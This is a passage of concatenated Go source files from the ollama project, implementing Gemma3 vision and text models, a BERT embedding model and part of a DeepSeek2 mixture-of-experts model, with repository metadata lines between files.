package gemma3 import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) var batchSize int = 1 type VisionSelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *VisionSelfAttention) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { headDim := opts.hiddenSize / opts.numHeads query := sa.Query.Forward(ctx, hiddenState) key := sa.Key.Forward(ctx, hiddenState) value := sa.Value.Forward(ctx, hiddenState) query = query.Reshape(ctx, headDim, opts.numHeads, query.Dim(1), batchSize) key = key.Reshape(ctx, headDim, opts.numHeads, key.Dim(1), batchSize) value = value.Reshape(ctx, headDim, opts.numHeads, value.Dim(1), batchSize) attention := nn.Attention(ctx, query, key, value, 1.0/math.Sqrt(float64(headDim)), nil) attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2), batchSize) hiddenState = sa.Output.Forward(ctx, attention) return hiddenState } type VisionMLP struct { FC1 *nn.Linear `gguf:"fc1"` FC2 *nn.Linear `gguf:"fc2"` } func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { hiddenState = mlp.FC1.Forward(ctx, hiddenState).GELU(ctx) hiddenState = mlp.FC2.Forward(ctx, hiddenState) return hiddenState } type VisionEncoderLayer struct { LayerNorm1 *nn.LayerNorm `gguf:"layer_norm1"` SelfAttention *VisionSelfAttention LayerNorm2 *nn.LayerNorm `gguf:"layer_norm2"` MLP *VisionMLP `gguf:"mlp"` } func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { residual := hiddenState // self attention hiddenState = e.LayerNorm1.Forward(ctx, hiddenState, opts.eps) hiddenState = e.SelfAttention.Forward(ctx, hiddenState, opts) hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState // feed forward hiddenState = e.LayerNorm2.Forward(ctx, hiddenState, 
opts.eps) hiddenState = e.MLP.Forward(ctx, hiddenState, opts) return hiddenState.Add(ctx, residual) } type VisionModelOptions struct { hiddenSize, numHeads int imageSize, patchSize int eps float32 } type VisionModel struct { PatchEmbedding *nn.Conv2D `gguf:"patch_embedding"` PositionEmbedding *nn.Embedding `gguf:"position_embedding"` PostLayerNorm *nn.LayerNorm `gguf:"post_layernorm"` Layers []VisionEncoderLayer `gguf:"blk"` *VisionModelOptions } func (m *VisionModel) Forward(ctx ml.Context, pixelValues ml.Tensor) ml.Tensor { numPatches := (m.imageSize / m.patchSize) * (m.imageSize / m.patchSize) hiddenState := m.PatchEmbedding.Forward(ctx, pixelValues, m.patchSize, m.patchSize, 0, 0, 1, 1) hiddenState = hiddenState.Reshape(ctx, numPatches, m.hiddenSize) hiddenState = hiddenState.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) positionIDs := ctx.Arange(0, float32(numPatches), 1, ml.DTypeI32) hiddenState = hiddenState.Add(ctx, m.PositionEmbedding.Forward(ctx, positionIDs)) for _, layer := range m.Layers { hiddenState = layer.Forward(ctx, hiddenState, m.VisionModelOptions) } hiddenState = m.PostLayerNorm.Forward(ctx, hiddenState, m.eps) return hiddenState } func newVisionModel(c fs.Config) *VisionModel { return &VisionModel{ Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count")), VisionModelOptions: &VisionModelOptions{ hiddenSize: int(c.Uint("vision.embedding_length")), numHeads: int(c.Uint("vision.attention.head_count")), imageSize: int(c.Uint("vision.image_size")), patchSize: int(c.Uint("vision.patch_size")), eps: c.Float("vision.attention.layer_norm_epsilon"), }, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/gemma3/model_text.go
model/models/gemma3/model_text.go
package gemma3 import ( "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model/input" ) type TextConfig struct { hiddenSize, contextLength, numHeads, numKVHeads int attnKeyLen, attnValLen int eps, ropeScale float32 ropeLocalBase float32 largeModelScaling bool slidingWindow uint32 slidingWindowPattern []bool ropeBase float32 ropeType string ropeOriginalContext int ropeExtrapolation float32 ropeBetaFast float32 ropeBetaSlow float32 finalLogitSoftcap float32 } func (o TextConfig) applyRotaryPositionEmbeddings(ctx ml.Context, states, positions ml.Tensor, base, scale float32) ml.Tensor { ropeOpts := []func(*rope.Options){rope.WithTypeNeoX()} if o.ropeType == "yarn" { attnFactor := float32(1.0 / (1.0 + 0.1*math.Log(float64(scale)))) ropeOpts = append(ropeOpts, rope.WithOriginalContextLength(o.ropeOriginalContext), rope.WithExtrapolationFactor(o.ropeExtrapolation), rope.WithAttentionFactor(attnFactor), rope.WithBetaFast(o.ropeBetaFast), rope.WithBetaSlow(o.ropeBetaSlow), ) } return nn.RoPE(ctx, states, positions, o.attnKeyLen, base, 1./scale, ropeOpts...) 
} type TextModel struct { TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []TextLayer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` *TextConfig } const ( gemmaGlobalCacheCount = 6 gemma1BLayerCount = 26 gemma4BLayerCount = 34 gemma12BLayerCount = 48 gemma27BLayerCount = 62 ) const ( cacheTypeSWA = iota cacheTypeCausal ) func newTextModel(c fs.Config) *TextModel { numBlocks := int(c.Uint("block_count")) m := TextModel{ Layers: make([]TextLayer, numBlocks), TextConfig: &TextConfig{ hiddenSize: int(c.Uint("embedding_length")), contextLength: int(c.Uint("context_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), attnKeyLen: int(c.Uint("attention.key_length", 256)), attnValLen: int(c.Uint("attention.value_length", 256)), eps: c.Float("attention.layer_norm_rms_epsilon", 1e-06), ropeLocalBase: c.Float("rope.local.freq_base", 10000.0), ropeBase: c.Float("rope.freq_base", 1000000.0), slidingWindow: c.Uint("attention.sliding_window"), slidingWindowPattern: c.Bools("attention.sliding_window_pattern"), ropeType: c.String("rope.scaling.type"), ropeOriginalContext: int(c.Uint("rope.scaling.original_context_length")), ropeExtrapolation: c.Float("rope.scaling.extrapolation_factor", 1.0), ropeBetaFast: c.Float("rope.scaling.beta_fast", 64.0), ropeBetaSlow: c.Float("rope.scaling.beta_slow", 1.0), ropeScale: c.Float("rope.scaling.factor", 1.0), finalLogitSoftcap: c.Float("final_logit_softcapping", 0.0), }, } // Apply corrections for older versions of the Gemma 3 models // by looking at whether they use sliding window attention and // based on their layer counts. 
if m.TextConfig.slidingWindow < uint32(m.TextConfig.contextLength) { switch numBlocks { case gemma1BLayerCount: // The 1B model has final logit softcapping set to 30.0 // but it should be 0.0 m.TextConfig.finalLogitSoftcap = 0.0 case gemma4BLayerCount, gemma12BLayerCount, gemma27BLayerCount: // The 4B, 12B, and 27B models have rope scale unset // but it shuold be set to 8.0 m.TextConfig.ropeScale = 8.0 } } if numBlocks == gemma27BLayerCount { m.largeModelScaling = true } return &m } type TextSelfAttention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm *nn.RMSNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.RMSNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (opts *TextConfig) ropeValuesForLayer(layer int) (base float32, scale float32) { if opts.slidingWindowPattern != nil && opts.slidingWindowPattern[layer] { return opts.ropeLocalBase, 1.0 } // Standard Gemma3: only every n-th layer is global, // where n = gemmaGlobalCacheCount, otherwise use // the local rope base if (layer+1)%gemmaGlobalCacheCount > 0 { return opts.ropeLocalBase, 1.0 } // default to global rope base return opts.ropeBase, opts.ropeScale } func (sa *TextSelfAttention) Forward(ctx ml.Context, layer int, hiddenState, positionIDs ml.Tensor, cache kvcache.Cache, opts *TextConfig) ml.Tensor { batchSize := hiddenState.Dim(1) ropeBase, ropeScale := opts.ropeValuesForLayer(layer) q := sa.Query.Forward(ctx, hiddenState) q = q.Reshape(ctx, opts.attnKeyLen, opts.numHeads, batchSize) q = sa.QueryNorm.Forward(ctx, q, opts.eps) q = opts.applyRotaryPositionEmbeddings(ctx, q, positionIDs, ropeBase, ropeScale) if opts.largeModelScaling { q = q.Scale(ctx, 1.0/math.Sqrt(float64(opts.hiddenSize/opts.numHeads))) } else { q = q.Scale(ctx, 1.0/math.Sqrt(float64(opts.attnKeyLen))) } k := sa.Key.Forward(ctx, hiddenState) k = k.Reshape(ctx, opts.attnKeyLen, opts.numKVHeads, batchSize) k = sa.KeyNorm.Forward(ctx, k, opts.eps) k = 
opts.applyRotaryPositionEmbeddings(ctx, k, positionIDs, ropeBase, ropeScale) v := sa.Value.Forward(ctx, hiddenState) v = v.Reshape(ctx, opts.attnValLen, opts.numKVHeads, batchSize) scaleFactor := 1.0 kqv := nn.Attention(ctx, q, k, v, scaleFactor, cache) kqv = kqv.Reshape(ctx, opts.attnValLen*opts.numHeads, batchSize) return sa.Output.Forward(ctx, kqv) } func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { ropeBase, ropeScale := m.TextConfig.ropeValuesForLayer(layer) return m.applyRotaryPositionEmbeddings(ctx, key, shift, ropeBase, ropeScale), nil } type TextMLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *TextMLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *TextConfig) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).GELU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type TextLayer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *TextSelfAttention PostAttentionNorm *nn.RMSNorm `gguf:"post_attention_norm"` MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP *TextMLP PostMLPNorm *nn.RMSNorm `gguf:"post_ffw_norm"` } func (l *TextLayer) Forward(ctx ml.Context, layer int, hiddenState, positionIDs, outputs ml.Tensor, cache kvcache.Cache, opts *TextConfig) ml.Tensor { residual := hiddenState hiddenState = l.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.SelfAttention.Forward(ctx, layer, hiddenState, positionIDs, cache, opts) hiddenState = l.PostAttentionNorm.Forward(ctx, hiddenState, opts.eps) // In the final layer (outputs != nil), optimize by pruning to just the token positions // we need logits for. 
if outputs != nil { hiddenState = hiddenState.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = l.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = l.MLP.Forward(ctx, hiddenState, opts) hiddenState = l.PostMLPNorm.Forward(ctx, hiddenState, opts.eps) return hiddenState.Add(ctx, residual) } func (m *TextModel) Forward(ctx ml.Context, batch input.Batch, cache kvcache.Cache) ml.Tensor { positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) hiddenState := m.TokenEmbedding.Forward(ctx, batch.Inputs) hiddenState = hiddenState.Scale(ctx, math.Sqrt(float64(m.TextConfig.hiddenSize))) // set image embeddings var except []int for _, image := range batch.Multimodal { visionOutputs := image.Multimodal[0].Tensor ctx.Forward(visionOutputs.Copy(ctx, hiddenState.View(ctx, image.Index*hiddenState.Stride(1), visionOutputs.Dim(0)*visionOutputs.Dim(1)))) for i := range visionOutputs.Dim(1) { except = append(except, image.Index+i) } } for i, layer := range m.Layers { // gemma alternates between the sliding window (local) and causal (global) // kv cache every 6 layers if cache != nil { cacheType := cacheTypeSWA if (i+1)%gemmaGlobalCacheCount == 0 { cacheType = cacheTypeCausal } cache.SetLayer(i) wc := cache.(*kvcache.WrapperCache) wc.SetLayerType(cacheType) if causal, ok := wc.UnderlyingCache().(*kvcache.Causal); ok { causal.SetCausal(ctx, kvcache.CausalOptions{Except: except}) } } var lastLayerOutputs ml.Tensor if i == len(m.Layers)-1 { lastLayerOutputs = batch.Outputs } hiddenState = layer.Forward(ctx, i, hiddenState, positions, lastLayerOutputs, cache, m.TextConfig) } return m.OutputNorm.Forward(ctx, hiddenState, m.eps) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/bert/embed.go
model/models/bert/embed.go
package bert import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/pooling" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.TextProcessor TokenEmbedding *nn.Embedding `gguf:"token_embd"` TypeEmbedding *nn.Embedding `gguf:"token_types"` PositionEmbedding *nn.Embedding `gguf:"position_embd"` TokenEmbeddingNorm *nn.LayerNorm `gguf:"token_embd_norm"` Layers []EncoderLayer `gguf:"blk"` Options } // Forward implements model.Model. func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { hiddenStates := m.TokenEmbedding.Forward(ctx, batch.Inputs) hiddenStates = hiddenStates.Add(ctx, m.TypeEmbedding.Weight.Slice(ctx, 1, 0, 1, 1)) hiddenStates = hiddenStates.Add(ctx, m.PositionEmbedding.Forward(ctx, ctx.Input().FromInts(batch.Positions, len(batch.Positions)))) hiddenStates = m.TokenEmbeddingNorm.Forward(ctx, hiddenStates, m.eps) for _, layer := range m.Layers { hiddenStates = layer.Forward(ctx, hiddenStates, &m.Options) } hiddenStates = m.poolingType.Forward(ctx, hiddenStates) if m.normalize { hiddenStates = hiddenStates.L2Norm(ctx, 1e-12) } return hiddenStates, nil } type EncoderLayer struct { *Attention AttentionNorm *nn.LayerNorm `gguf:"attn_output_norm"` *MLP MLPNorm *nn.LayerNorm `gguf:"layer_output_norm"` } func (e *EncoderLayer) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { // Attention residual := hiddenStates hiddenStates = e.Attention.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) hiddenStates = e.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) // MLP residual = hiddenStates hiddenStates = e.MLP.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) hiddenStates = e.MLPNorm.Forward(ctx, hiddenStates, opts.eps) return hiddenStates } type Attention struct { Query *nn.Linear `gguf:"attn_q"` QueryNorm 
*nn.LayerNorm `gguf:"attn_q_norm"` Key *nn.Linear `gguf:"attn_k"` KeyNorm *nn.LayerNorm `gguf:"attn_k_norm"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (a *Attention) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { batchSize := hiddenStates.Dim(1) query := a.Query.Forward(ctx, hiddenStates) if a.QueryNorm != nil { query = a.QueryNorm.Forward(ctx, query, opts.eps) } query = query.Reshape(ctx, opts.headDim(), opts.numHeads, batchSize) key := a.Key.Forward(ctx, hiddenStates) if a.KeyNorm != nil { key = a.KeyNorm.Forward(ctx, key, opts.eps) } key = key.Reshape(ctx, opts.headDim(), cmp.Or(opts.numKVHeads, opts.numHeads), batchSize) value := a.Value.Forward(ctx, hiddenStates) value = value.Reshape(ctx, opts.headDim(), cmp.Or(opts.numKVHeads, opts.numHeads), batchSize) attention := nn.Attention(ctx, query, key, value, 1/math.Sqrt(float64(opts.headDim())), nil) attention = attention.Reshape(ctx, opts.hiddenSize, batchSize) return a.Output.Forward(ctx, attention) } type MLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (m *MLP) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { return m.Down.Forward(ctx, m.Up.Forward(ctx, hiddenStates).GELU(ctx)) } type Options struct { hiddenSize, numHeads, numKVHeads, keyLength, valueLength int poolingType pooling.Type eps float32 normalize bool } func (o Options) headDim() int { return cmp.Or(o.keyLength, o.valueLength, o.hiddenSize/o.numHeads) } func New(c fs.Config) (model.Model, error) { vocab := &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Scores: c.Floats("tokenizer.ggml.scores"), Types: c.Ints("tokenizer.ggml.token_type"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{ int32(cmp.Or( c.Uint("tokenizer.ggml.cls_token_id"), c.Uint("tokenizer.ggml.bos_token_id"), )), }, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", true), EOS: []int32{ int32(cmp.Or( 
c.Uint("tokenizer.ggml.separator_token_id"), //nolint:misspell // NOTE: "seperator_token_id" is a typo in model metadata but we need to // support it for compatibility. c.Uint("tokenizer.ggml.seperator_token_id"), c.Uint("tokenizer.ggml.eos_token_id"), )), }, } var processor model.TextProcessor switch c.String("tokenizer.ggml.model", "bert") { case "bert": processor = model.NewWordPiece(vocab, true) default: return nil, model.ErrUnsupportedTokenizer } return &Model{ TextProcessor: processor, Layers: make([]EncoderLayer, c.Uint("block_count")), Options: Options{ hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), eps: c.Float("attention.layer_norm_epsilon"), poolingType: pooling.Type(c.Uint("pooling_type")), normalize: c.Bool("normalize_embeddings", true), }, }, nil } func init() { model.Register("bert", New) model.Register("bert_embed", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/deepseek2/model.go
model/models/deepseek2/model.go
package deepseek2 // uses deepseek 2 architecture but written based on deepseek 3 model import ( "cmp" "math" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Options struct { isMLA bool numExpertsUsed int numExperts int normTopKProb bool routedScalingFactor float32 kvLoraRank, qkNopeHeadDim, qkRopeHeadDim, kqNopeHeadDim, qkHeadDim int qLoraRank int vHeadDim int hiddenSize, numHeads, numKVHeads, originalContextLength int eps, ropeBase, ropeScale float32 kqScale float64 } func (o Options) applyRotaryPositionEmbeddings(ctx ml.Context, t, p ml.Tensor) ml.Tensor { return nn.RoPE(ctx, t, p, o.qkRopeHeadDim, o.ropeBase, 1./o.ropeScale, rope.WithOriginalContextLength(o.originalContextLength), rope.WithExtrapolationFactor(1.), rope.WithAttentionFactor(float32(1.0/(1.0+0.1*math.Log(float64(o.ropeScale))))), ) } type Attention struct { Q *nn.Linear `gguf:"attn_q"` QA *nn.Linear `gguf:"attn_q_a"` QANorm *nn.RMSNorm `gguf:"attn_q_a_norm"` QB *nn.Linear `gguf:"attn_q_b"` KVA *nn.Linear `gguf:"attn_kv_a_mqa"` KVANorm *nn.RMSNorm `gguf:"attn_kv_a_norm"` KVB *nn.Linear `gguf:"attn_kv_b"` KB *nn.Linear `gguf:"attn_k_b"` VB *nn.Linear `gguf:"attn_v_b"` Output *nn.Linear `gguf:"attn_out,alt:attn_output"` } func (attn *Attention) Forward(ctx ml.Context, hiddenStates, positions ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { seqLength := hiddenStates.Dim(1) var query ml.Tensor if opts.qLoraRank == 0 { query = attn.Q.Forward(ctx, hiddenStates) } else { query = attn.QA.Forward(ctx, hiddenStates) query = attn.QANorm.Forward(ctx, query, opts.eps) query = attn.QB.Forward(ctx, query) } query = query.Reshape(ctx, query.Dim(0)/opts.numHeads, opts.numHeads, seqLength) queryChunks := query.ChunkSections(ctx, 0, opts.qkNopeHeadDim, opts.qkRopeHeadDim) compressedKV := attn.KVA.Forward(ctx, 
hiddenStates) kPass := compressedKV.Slice(ctx, 0, 0, opts.kvLoraRank, 1) kRot := compressedKV.View(ctx, opts.kvLoraRank*compressedKV.Stride(0), opts.qkRopeHeadDim, compressedKV.Stride(1), 1, compressedKV.Stride(1), compressedKV.Dim(1), ) qRot := opts.applyRotaryPositionEmbeddings(ctx, queryChunks[1], positions) kRot = opts.applyRotaryPositionEmbeddings(ctx, kRot, positions) kPass = attn.KVANorm.Forward(ctx, kPass, opts.eps) var attention ml.Tensor if !opts.isMLA { // v3 kPass = attn.KVB.Forward(ctx, kPass) kv := kPass.Reshape(ctx, kPass.Dim(0)/opts.numKVHeads, opts.numKVHeads, seqLength) kvChunks := kv.ChunkSections(ctx, 0, opts.kqNopeHeadDim, opts.vHeadDim) kRot = kRot.Repeat(ctx, 1, queryChunks[0].Dim(1)) query = qRot.Concat(ctx, queryChunks[0], 0) key := kRot.Concat(ctx, kvChunks[0], 0) attention = nn.Attention(ctx, query, key, kvChunks[1], opts.kqScale, cache) } else { // v3.1 qPass := queryChunks[0].Permute(ctx, 0, 2, 1, 3) qPassAbsorb := attn.KB.Forward(ctx, qPass) qPassAbsorb = qPassAbsorb.Permute(ctx, 0, 2, 1, 3) query = qRot.Concat(ctx, qPassAbsorb, 0) kPass = kPass.Reshape(ctx, opts.kvLoraRank, 1, seqLength) key := kRot.Concat(ctx, kPass, 0) value := kPass attention = nn.AttentionWithVMLA(ctx, query, key, value, nil, attn.VB.Weight, opts.kqScale, cache) } attention = attention.Reshape(ctx, attention.Dim(0)*attention.Dim(1), seqLength) return attn.Output.Forward(ctx, attention) } type MLP interface { Forward(ml.Context, ml.Tensor, *Options) ml.Tensor } type sparse struct { Router *nn.Linear `gguf:"ffn_gate_inp"` Gate *nn.Linear `gguf:"ffn_gate_exps"` Up *nn.Linear `gguf:"ffn_up_exps"` Down *nn.Linear `gguf:"ffn_down_exps"` SharedExpert *dense `gguf:",suf:_shexp"` ExpProbsBias ml.Tensor `gguf:"exp_probs_b.bias,alt:exp_probs_b"` } func (moe *sparse) Moe(ctx ml.Context, hiddenStates, topKIndices, topKWeights ml.Tensor, opts *Options) ml.Tensor { hiddenStates = hiddenStates.Reshape(ctx, hiddenStates.Dim(0), 1, hiddenStates.Dim(1)) upStates := 
moe.Up.Weight.MulmatID(ctx, hiddenStates, topKIndices) hiddenStates = moe.Gate.Weight.MulmatID(ctx, hiddenStates, topKIndices) hiddenStates = hiddenStates.SILU(ctx, upStates) experts := moe.Down.Weight.MulmatID(ctx, hiddenStates, topKIndices) experts = experts.Mul(ctx, topKWeights) nextStates := experts.View(ctx, 0, experts.Dim(0), experts.Stride(2), experts.Dim(2)) for i := 1; i < opts.numExpertsUsed; i++ { nextStates = nextStates.Add(ctx, experts.View(ctx, i*experts.Stride(1), experts.Dim(0), experts.Stride(2), experts.Dim(2))) } return nextStates } func (moe *sparse) topKIndices(ctx ml.Context, scores ml.Tensor, opts *Options) ml.Tensor { if moe.ExpProbsBias != nil { scores = scores.Add(ctx, moe.ExpProbsBias) } topKIndices := scores.TopK(ctx, opts.numExpertsUsed) return topKIndices } func (moe *sparse) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { residuals := hiddenStates routerLogits := moe.Router.Forward(ctx, hiddenStates) scores := routerLogits.Sigmoid(ctx) topKIndices := moe.topKIndices(ctx, scores, opts) topKWeights := scores.Reshape(ctx, 1, opts.numExperts, hiddenStates.Dim(1)).Rows(ctx, topKIndices) if opts.normTopKProb { topKWeights = topKWeights.Reshape(ctx, opts.numExpertsUsed, hiddenStates.Dim(1)) topKWeights = topKWeights.Div(ctx, topKWeights.SumRows(ctx)) topKWeights = topKWeights.Reshape(ctx, 1, opts.numExpertsUsed, hiddenStates.Dim(1)) } topKWeights = topKWeights.Scale(ctx, float64(opts.routedScalingFactor)) hiddenStates = moe.Moe(ctx, hiddenStates, topKIndices, topKWeights, opts) sharedExpertResult := moe.SharedExpert.Forward(ctx, residuals, opts) hiddenStates = hiddenStates.Add(ctx, sharedExpertResult) return hiddenStates } type dense struct { Gate *nn.Linear `gguf:"ffn_gate"` Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *dense) Forward(ctx ml.Context, hiddenStates ml.Tensor, opts *Options) ml.Tensor { hiddenStates = mlp.Gate.Forward(ctx, hiddenStates).SILU(ctx, mlp.Up.Forward(ctx, 
hiddenStates)) return mlp.Down.Forward(ctx, hiddenStates) } type Layer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` Attention *Attention MLPNorm *nn.RMSNorm `gguf:"ffn_norm"` MLP MLP } func (t *Layer) Forward(ctx ml.Context, hiddenStates, positions, outputs ml.Tensor, cache kvcache.Cache, opts *Options) ml.Tensor { residual := hiddenStates hiddenStates = t.AttentionNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = t.Attention.Forward(ctx, hiddenStates, positions, cache, opts) if outputs != nil { hiddenStates = hiddenStates.Rows(ctx, outputs) residual = residual.Rows(ctx, outputs) } hiddenStates = hiddenStates.Add(ctx, residual) residual = hiddenStates hiddenStates = t.MLPNorm.Forward(ctx, hiddenStates, opts.eps) hiddenStates = t.MLP.Forward(ctx, hiddenStates, opts) hiddenStates = hiddenStates.Add(ctx, residual) return hiddenStates } type Model struct { model.Base model.BytePairEncoding TokenEmbedding *nn.Embedding `gguf:"token_embd"` Layers []Layer `gguf:"blk"` OutputNorm *nn.RMSNorm `gguf:"output_norm"` Output *nn.Linear `gguf:"output,alt:token_embd"` *Options } func New(c fs.Config) (model.Model, error) { layers := make([]Layer, c.Uint("block_count")) firstDenseLayerIndex := int(c.Uint("leading_dense_block_count")) for i := range layers { if i < firstDenseLayerIndex { layers[i].MLP = &dense{} } else { layers[i].MLP = &sparse{} } } mScale := float32(1.0 + float64(c.Float("rope.scaling.yarn_log_multiplier"))*math.Log(float64(c.Float("rope.scaling.factor")))) kqScale := float64(mScale) * float64(mScale) / math.Sqrt(float64(c.Uint("attention.key_length"))) isMLA := c.Uint("attention.key_length_mla") != 0 && c.Uint("attention.value_length_mla") != 0 keyLength := int(cmp.Or(c.Uint("attention.key_length_mla"), c.Uint("attention.key_length"))) valueLength := int(cmp.Or(c.Uint("attention.value_length_mla"), c.Uint("attention.value_length"))) var pre []string switch c.String("tokenizer.ggml.pre") { case "deepseek-v3": pre = []string{ // Split regex into 
multiple parts (according to DeepSeek3's regex) "\\p{N}{1,3}", `[一-龥぀-ゟ゠-ヿ]+`, "[!\"#$%&'()*+,\\-./:;<=>?@\\[\\\\\\]^_`{|}~][A-Za-z]+|[^\r\n\\p{L}\\p{P}\\p{S}]?[\\p{L}\\p{M}]+| ?[\\p{P}\\p{S}]+[\r\n]*|\\s*[\r\n]+|\\s+(?!\\S)|\\s+", } case "deepseek-llm": // TODO: these models haven't been vetted so skip for now // pre = []string{ // "[\r\n]", // "\\s?[A-Za-zµÀ-ÖØ-öø-ƺƼ-ƿDŽ-ʓʕ-ʯͰ-ͳͶͷͻ-ͽͿΆΈ-ΊΌΎ-ΡΣ-ϵϷ-ҁҊ-ԯԱ-ՖႠ-ჅᎠ-Ᏽᏸ-ᏽᲐ-ᲺᲽ-Ჿᴀ-ᴫᵫ-ᵷᵹ-ᶚḀ-ἕἘ-Ἕἠ-ὅὈ-Ὅὐ-ὗὙὛὝὟ-ώᾀ-ᾴᾶ-ᾼιῂ-ῄῆ-ῌῐ-ΐῖ-Ίῠ-Ῥῲ-ῴῶ-ῼℂℇℊ-ℓℕℙ-ℝℤΩℨK-ℭℯ-ℴℹℼ-ℿⅅ-ⅉⅎↃↄⰀ-ⱻⱾ-ⳤⳫ-ⳮⳲⳳꙀ-ꙭꚀ-ꚛꜢ-ꝯꝱ-ꞇꞋ-ꞎꭰ-ꮿff-stﬓ-ﬗA-Za-z𐐀-𐑏𐒰-𐓓𐓘-𐓻𐲀-𐲲𐳀-𐳲𑢠-𑣟𞤀-𞥃]+", // "\\s?[!-/:-~!-/:-~‘-‟ -。]+", // "\\s+$", // "[一-龥ࠀ-一가-퟿]+", // "[0-9]", // } fallthrough default: return nil, model.ErrUnsupportedTokenizer } m := Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, pre..., ), Layers: layers, Options: &Options{ isMLA: isMLA, hiddenSize: int(c.Uint("embedding_length")), numHeads: int(c.Uint("attention.head_count")), numKVHeads: int(c.Uint("attention.head_count_kv")), eps: c.Float("attention.layer_norm_rms_epsilon"), ropeBase: c.Float("rope.freq_base"), ropeScale: c.Float("rope.scaling.factor", 1), numExperts: int(c.Uint("expert_count")), numExpertsUsed: int(c.Uint("expert_used_count")), normTopKProb: c.Bool("expert_weights_norm", true), qLoraRank: int(c.Uint("attention.q_lora_rank")), kvLoraRank: int(c.Uint("attention.kv_lora_rank")), qkHeadDim: keyLength, vHeadDim: valueLength, 